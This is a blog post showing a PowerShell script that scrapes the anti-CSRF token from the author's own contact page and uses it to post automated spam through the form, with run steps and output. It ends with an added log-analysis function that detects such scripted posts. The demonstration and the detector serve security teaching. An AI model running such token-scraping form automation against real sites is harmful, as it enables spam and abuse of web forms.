Hacking Anti Cross-site Request Forgery Tokens (CSRF) With PowerShell

December 16th, 2009

I ported the example of how to hack an Anti CSRF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.

How to hack an Anti CSRF Token from PowerShell

function global:spam-adamdotcom(){

  # Load the assembly containing WebClientWithCookies and RegexUtilities
  [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null
 
  # Load the assembly containing System.Web.HttpUtility
  [Reflection.Assembly]::LoadWithPartialName("System.Web") | out-null

  # create a new instance of the HTTP Web Client that supports cookies
  $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

  # download the page that contains the Anti CSRF Token
  [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

  # use a regular expression to grab the Anti CSRF Token from the Set-Cookie header
  #  - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
  $regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
  $match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
  $antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value

  write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

  # construct the message including the Anti CSRF Token
  $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
             "&fromName=Johnathon Fink" +
             "&fromAddress=prancesw@rmcres.com" +
             "&subject=Call for your diploma now" +
             "&body=Is your lack of a degree..."

  # send spam-spam-spam
  $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
                              ([System.Text.Encoding]::UTF8.GetBytes($message)));

  write-host "`nSuccess!!! Your spam has been sent.`n"
}

To run this script:

  1. Download the script
  2. Run PowerShell
  3. Load the script: .\Automated-AntiCSRF-Authentication-Script.ps1
  4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here's the output as seen on my machine:

PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
PS C:\> spam-adamdotcom

Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

Success!!! Your spam has been sent.

This example uses a class derived from the .NET Framework's WebClient class, with cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be resolved automatically by calling the download-client function, which is also defined in the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1
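
Seen from the server side, the script above fetches /contact and posts to /contact/send with a valid token almost immediately, which is faster than a person fills in a form. The following log check is an added example, not part of the original post or the author's script; the log lines are constructed, and the reduced W3C field list, the function name Find-ScriptedFormPost and the 5-second threshold are assumptions.

```powershell
# Added example. Log lines are constructed; the field list and the threshold
# are assumptions, not values taken from the original page.
$sampleLog = @'
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2009-12-16 10:00:01 192.0.2.10 GET /contact 200
2009-12-16 10:00:01 192.0.2.10 POST /contact/send 200
2009-12-16 10:00:03 192.0.2.10 GET /contact 200
2009-12-16 10:00:04 192.0.2.10 POST /contact/send 200
2009-12-16 10:02:00 198.51.100.7 GET /contact 200
2009-12-16 10:03:25 198.51.100.7 POST /contact/send 200
2009-12-16 10:05:00 203.0.113.5 POST /contact/send 500
'@ -split "`r?`n"

function Find-ScriptedFormPost {
    param(
        [string[]] $LogLine,
        [string]   $FormPath       = '/contact',
        [string]   $SubmitPath     = '/contact/send',
        [double]   $MinFillSeconds = 5    # assumed: faster than a person can fill the form
    )
    $lastGet = @{}    # client IP -> time of its most recent GET of the form page
    foreach ($line in $LogLine) {
        if ($line -match '^\s*(#|$)') { continue }    # skip directives and blank lines
        $date, $time, $ip, $method, $path, $status = $line -split '\s+'
        $when = [datetime]::ParseExact("$date $time", 'yyyy-MM-dd HH:mm:ss',
                    [Globalization.CultureInfo]::InvariantCulture)
        if ($method -eq 'GET' -and $path -eq $FormPath) {
            $lastGet[$ip] = $when    # the token cookie is issued on this response
        }
        elseif ($method -eq 'POST' -and $path -eq $SubmitPath) {
            # A POST with no earlier GET in the log cannot be timed; report it separately.
            $gap    = $null
            $reason = 'no form fetch seen'
            if ($lastGet.ContainsKey($ip)) {
                $gap    = ($when - $lastGet[$ip]).TotalSeconds
                $reason = 'form fetched and posted too quickly'
            }
            if ($null -eq $gap -or $gap -lt $MinFillSeconds) {
                [pscustomobject]@{
                    Time = $when; ClientIp = $ip; Status = [int]$status
                    GapSeconds = $gap; Reason = $reason
                }
            }
        }
    }
}

Find-ScriptedFormPost -LogLine $sampleLog | Format-Table -AutoSize
```

Clients behind a shared address are grouped under one key, so treat the rows it returns as candidates for rate limiting or a challenge rather than as proof of automation.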

Author: Adam Kahtava